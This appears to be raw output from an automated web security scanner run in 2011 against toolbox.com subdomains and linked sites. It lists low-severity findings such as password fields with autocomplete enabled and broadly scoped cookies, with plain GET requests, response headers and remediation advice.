HTTP/1.1 200 OK Cache-Control: private Content-Length: 72791 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL:
http://eai.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71618 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
The page contains a form with the following action URL:
http://emergingtech.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47575 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:43 GMT Connection: close
The page contains a form with the following action URL:
http://erp.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74629 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:46 GMT Connection: close
The page contains a form with the following action URL:
http://finance.toolbox.com/default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: finance.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81717 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
The page contains a form with the following action URL:
http://hardware.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78653 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
The page contains a form with the following action URL:
http://infor.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54154 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:00 GMT Connection: close
The page contains a form with the following action URL:
http://it.toolbox.com/groups/
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET /groups/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79052 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The page contains a form with the following action URL:
http://java.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59140 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=oyzpf135dvjl5u4503tynefb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:01 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=b5wett3jdmxpvtvb4e4glymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:06 GMT Connection: close
The page contains a form with the following action URL:
http://linux.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72604 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
The page contains a form with the following action URL:
http://networking.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91759 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:14 GMT Connection: close
The page contains a form with the following action URL:
http://oracle.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The page contains a form with the following action URL:
http://peoplesoft.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70995 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:22 GMT Connection: close
The page contains a form with the following action URL:
http://sap.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:36 GMT Connection: close
The page contains a form with the following action URL:
http://security.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:33 GMT Connection: close
The page contains a form with the following action URL:
http://siebel.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:39 GMT Connection: close
The page contains a form with the following action URL:
http://storage.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
The page contains a form with the following action URL:
http://supplychain.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74807 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:42 GMT Connection: close
The page contains a form with the following action URL:
http://telephony.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /toolboxforit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:27 GMT Server: hi Status: 200 OK X-Transaction: 1296053787-90115-59528 ETag: "88e9aa64188f9d64f88986da2628b13f" Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT X-Runtime: 0.01067 Content-Type: text/html; charset=utf-8 Content-Length: 45652 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
http://unix.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
The page contains a form with the following action URL:
http://visualbasic.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL:
http://webdesign.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL:
http://windows.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL:
http://wireless.ittoolbox.com/Default.aspx
The form contains the following password field with autocomplete enabled:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
The page contains a form with the following action URL:
http://www.ebizq.net/goldclub/login.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
The form contains the following password field with autocomplete enabled:
pass
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
The page contains a form with the following action URL:
http://www.toolbox.com/Feedback.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /Feedback.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 24211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:46 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/PrivacyPolicy.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/TermsofUse.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/about/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /about/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22640 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:40 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/careers/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /careers/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/contact/
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /contact/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/it/advertising/
The form contains the following password field with autocomplete enabled:
ctl00$ctl00$m$txtSignin_Password
Request
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL:
http://www.toolbox.com/news/Default.aspx
The form contains the following password field with autocomplete enabled:
ctl00$m$txtSignin_Password
Request
GET /news/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21896 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The page contains a form which POSTs data to the domain creator.zoho.com. The form contains the following fields:
formid
formLinkId
formLinkName
tableName
viewid
recType
viewLinkName
pkValue
dateFormat
timeZone
uiDateFormat
fromIDX
privatelink
viewPrivateLink
appLinkName
sharedBy
scriptembed
nexturl
Name
Email_ID
submit
subject
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /products/desktop-central/index.html HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:01 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
